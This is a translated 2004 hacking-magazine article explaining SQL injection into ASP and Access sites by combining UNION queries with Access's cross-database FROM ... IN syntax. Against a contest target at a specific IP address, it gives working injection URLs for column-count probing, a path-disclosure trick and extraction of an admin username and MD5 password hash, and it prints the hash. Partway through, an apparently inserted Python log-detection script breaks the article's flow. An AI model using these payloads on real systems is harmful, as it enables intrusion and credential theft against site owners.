Cross-database queries in Access

xiaoxiao2021-03-06  43

This article was published in Black Defense issue 12 and one of the following; no payment was received, so don't pass it on!!!

Text / superhei 04-7-28

Everyone still remembers cross-database queries in MSSQL. In fact, Access can also run a query across two databases. Below I introduce cross-database queries in Access.

Let us first look at how to query another MDB file from within Access. We create an arbitrary empty database and query the contents of the admin table in the database D:/Daos/db/daidalos.mdb. The SQL statement is:

SELECT * from admin in "d:/daos/db/daidalos.mdb"

The query succeeds and returns the contents of the table in the target database:

In actual ASP injection, you need to run two SELECTs at the same time. If you are familiar with PHP + MySQL injection, it is easy to think of a joint query using UNION. We can use it in Access as well, and a UNION query has a further benefit: there is no need to guess the data one character at a time, because the field can be displayed directly, as in MySQL + PHP injection (MIX has written a detailed article on the specifics). From the above, you can see that the following 2 conditions must be met:

1. To use a UNION query, you must know the number of fields in the preceding SELECT.

2. You must know the location of the target database, as an absolute path.

Condition 1 can be worked out manually from the error messages returned, or it can be automated.

Condition 2 is the difficult point, but we can meet it by using the "Access Exposition" trick, which makes the server reveal the database path. Some people will say that if you know where the database is, you can simply download it directly. In fact, databases nowadays are generally protected against download, and some are not under the web directory at all.

The first level in the fourth round of Black Defense was a set of 2 ASP + Access download systems: the rainpoint download system and the throne download system. Testing showed that the throne download system has a database that cannot be downloaded, and there seems to be nowhere to inject. The rainpoint download system is vulnerable: its database can be located and downloaded directly, and it can also be injected. However, the rainpoint back end is very simple and offers nothing to use, so our target is the background password of the throne system. Below I demonstrate getting the background password of the throne system through the rainpoint system:

We learned that list.asp of the rainpoint system is injectable. Let's use UNION to get the number of fields in the data table. Submit:

http://219.237.81.46/yddown/list.asp?id=75 Union Select 1 From USERINFO

It returns:

Microsoft Jet Database Engine Error '80040e14'

The number of columns in the two data sheets or queries selected in the joint query do not match.

/yddown/list.asp, line?

The number of fields is wrong. (I wrote a Perl script to guess it automatically; see the code later.)

When we submit:

http://219.237.81.46/yddown/list.asp?id=75 Union Select 1, 2, 3%20From USERINFO

No error is returned.

Haha! We now have the number of fields, and the position of field 1 on the page can display the data we query. There is still the problem of the database path. That is simple; we submit:

http://219.237.81.46/dsdown\regs.asp

The path is returned successfully:

Microsoft Jet Database Engine Error '80004005'

'D: /111/db/kljdsld.asa' is not an effective path. Determine if the path name spell is correct, and whether it is connected to the server stored.

/DSDOWNDB/USER.ASP, line

(Note: the path returned is not necessarily complete; the real path is: D:/111/dsdown/db/kljdsld.asa)

Now we query across databases. Construct the URL as follows:

http://219.237.81.46/yddown/list.asp?id=75 Union Select Admin, 3, 2%20From Admin IN "d:/111/dsdown/db/kljdsld.asa"%20where%20ID=1

The statement above uses UNION to query the Admin field of the row with id = 1 in the Admin table of the database D:/111/db/kljdsld.asa; if it succeeds, the username is displayed directly:

We get the user name admin. Next we submit the following:

http://219.237.81.46/yddown/list.asp?id=75 Union Select PWS, 3, 2%20From ADMIN IN "d:/111/dsdown/db/kljdsld.asa"%20where%20ID=1


We get the password as a 32-character MD5 hash: 77E6CBB3F9468EADB655AE6826357922

Our cross-database query succeeded. Here I only demonstrate the cross-database query; there is no need to actually manage the Black Defense system :).
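On the defending side, every request in this walkthrough leaves a recognisable trace in the web server log. The following is an added example, not code from the original article: a Python filter that flags the three request shapes shown above (UNION SELECT in a parameter, a Jet FROM ... IN "path" external-database clause, and a backslash in the URL path). The log field layout, addresses, paths and table names in the sample are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# UNION SELECT appended to a parameter: column-count probing and data reads.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# Jet external-database clause: FROM <table> IN "<path>" (or '<path>').
EXTERNAL_DB_RE = re.compile(r"\bfrom\s+\[?\w+\]?\s+in\s*[\"']", re.I)

def classify(uri_stem, uri_query):
    """Return the findings for one request (empty list if it looks clean)."""
    # Decode twice so double-encoded payloads (%2520) are normalised as well.
    query = unquote_plus(unquote_plus(uri_query))
    findings = []
    if UNION_RE.search(query):
        findings.append("union-select")
    if EXTERNAL_DB_RE.search(query):
        findings.append("external-db-in-clause")
    # A backslash in the URL path is the path-disclosure request shape.
    if "\\" in unquote_plus(uri_stem):
        findings.append("backslash-in-path")
    return findings

def scan(log_lines):
    """Return (client_ip, uri_stem, findings) for every suspicious log line."""
    hits = []
    for line in log_lines:
        fields = line.split()
        # Assumed layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
        if line.startswith("#") or len(fields) < 7:
            continue
        findings = classify(fields[4], fields[5])
        if findings:
            hits.append((fields[2], fields[4], findings))
    return hits

# Constructed sample log: documentation addresses, hypothetical paths and tables.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2004-07-28 10:00:01 192.0.2.10 GET /app/list.asp id=75 200",
    "2004-07-28 10:00:05 192.0.2.66 GET /app/list.asp id=75+union+select+1+from+t1 500",
    "2004-07-28 10:00:09 192.0.2.66 GET /app2%5cregs.asp - 500",
    "2004-07-28 10:00:20 192.0.2.66 GET /app/list.asp "
    "id=75%20union%20select%20c1,3,2%20from%20t2%20in%20%22d:/x/db/a.asa%22 200",
    "2004-07-28 10:01:00 192.0.2.11 GET /app/search.asp q=trade+union+news 200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on the external-database clause is the strongest of the three signals, since normal application traffic has no reason to carry a file path inside a FROM ... IN clause.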

Summary:

This article mainly introduces two very useful methods. First, guessing data one character at a time in ASP injection is very troublesome; using UNION to display the data directly gets it in one step, whether or not it contains Chinese or special characters. Second, the cross-database query is very flexible and can bring unexpected gains during a penetration.
